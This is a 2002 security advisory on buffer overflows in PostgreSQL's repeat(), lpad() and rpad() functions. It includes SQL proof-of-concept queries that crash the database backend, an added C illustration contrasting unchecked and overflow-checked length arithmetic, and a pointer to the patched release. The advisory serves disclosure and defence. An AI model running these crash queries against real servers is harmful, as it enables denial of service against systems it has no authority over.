21st Aug 2002 [SBWID-5647]
COMMAND
PostgreSQL remote and local buffer overflows
SYSTEMS AFFECTED
all versions
PROBLEM
From Sir Mordred The Traitor, Mordred Labs advisories [0x0003] and [0x0004]:
Bug 1
=====
Upon invoking the repeat() function,
src/backend/utils/adt/oracle_compat.c::repeat()
gets called, which suffers from a buffer overflow.
--[ How to reproduce:
psql> select repeat('xxx',1431655765);
pqReadData() -- backend closed the channel unexpectedly.
This probably means the backend terminated abnormally
before or while processing the request.
The connection to the server was lost. Attempting reset: Failed.
Bug 2
=====
There are two buffer overflows in
src/backend/utils/adt/oracle_compat.c.
1) lpad(text, integer, text) function
2) rpad(text, integer, text) function
--[ Details:
The code for these functions is
src/backend/utils/adt/oracle_compat.c::lpad() and
src/backend/utils/adt/oracle_compat.c::rpad() respectively.
The code suffers from a buffer overflow (of course).
--[ How to reproduce:
shell> pgsql template1 postgres
template1=# select version();
version
-----------------------------------------------------------
PostgreSQL 7.2 on i686-pc-linux-gnu, compiled by GCC 2.96
(1 row)
template1=# create database my_db with encoding='UNICODE';
CREATE DATABASE
template1=# \c my_db
You are now connected to database my_db.
my_db=# select lpad('xxxxx',1431655765,'yyyyyyyyyyyyyyyy');
pqReadData() -- backend closed the channel unexpectedly.
This probably means the backend terminated abnormally
before or while processing the request.
The connection to the server was lost. Attempting reset: Failed.
The same for rpad() function.
The vulnerable encodings are: EUC_JP, EUC_CN, EUC_KR, EUC_TW, UNICODE,
MULE_INTERNAL.
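Both reproductions above pass the count 1431655765 (0x55555555); multiplied by the 3-byte argument 'xxx' that gives 4294967295, which is exactly where a 32-bit length computation wraps to -1, so whatever buffer is sized from it is far too small. The following C program is an added illustration, not PostgreSQL's code and not part of the Mordred Labs advisory: it models a simplified repeat()-style size computation in the unchecked 32-bit style beside an overflow-checked version, and a builder that refuses to allocate when the size is not representable. The function names and the reduction to a single byte string are assumptions; the same guarding applies to the target lengths taken by lpad() and rpad().

```c
#include <limits.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Simplified, hypothetical model of the size arithmetic a repeat()-style
 * function must do before allocating its result: "slen bytes, count times".
 * Added illustration only; this is not PostgreSQL's code.
 */

/* Unchecked style: the product is formed in 32 bits and can wrap.
 * 3 * 1431655765 == 4294967295 == 0xFFFFFFFF, which reads back as -1. */
int32_t repeat_len_unchecked(int32_t slen, int32_t count)
{
    /* the uint32_t casts make the wraparound well-defined for the demo */
    return (int32_t)((uint32_t)slen * (uint32_t)count);
}

/* Checked style: refuse negative inputs and any product that does not fit
 * in int32_t. Returns 1 and stores the length on success, 0 on failure. */
int repeat_len_checked(int32_t slen, int32_t count, int32_t *out)
{
    if (slen < 0 || count < 0)
        return 0;
    if (count != 0 && slen > INT32_MAX / count)
        return 0;                       /* slen * count would overflow */
    *out = slen * count;
    return 1;
}

/* Allocates and builds the repetition only when the size is representable;
 * returns NULL (instead of a too-small buffer) otherwise. */
char *safe_repeat(const char *s, int32_t count)
{
    size_t slen = strlen(s);
    int32_t total;
    char *buf;

    if (slen > (size_t)INT32_MAX)
        return NULL;
    if (!repeat_len_checked((int32_t)slen, count, &total))
        return NULL;
    buf = malloc((size_t)total + 1);   /* +1 for the terminating NUL */
    if (buf == NULL)
        return NULL;
    for (int32_t i = 0; i < count; i++)
        memcpy(buf + (size_t)i * slen, s, slen);
    buf[total] = '\0';
    return buf;
}

int main(void)
{
    const int32_t count = 1431655765;  /* the count used in the advisory */
    int32_t len;
    char *ok;

    printf("unchecked length for 'xxx' x %d: %d\n",
           count, repeat_len_unchecked(3, count));
    printf("checked length accepted: %d\n",
           repeat_len_checked(3, count, &len));

    ok = safe_repeat("xxx", 3);
    printf("safe_repeat(\"xxx\", 3) = %s\n", ok);
    free(ok);
    printf("safe_repeat(\"xxx\", %d) = %p\n",
           count, (void *)safe_repeat("xxx", count));
    return 0;
}
```

The check `slen > INT32_MAX / count` is the portable way to test the product before computing it; testing the product after the fact is too late, because signed overflow is undefined behaviour in C and the compiler may drop the comparison.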
SOLUTION
Update (26 August 2002)
======
PostgreSQL 7.2.2 sources:
ftp://ftp.postgresql.org/pub/sources/v7.2.2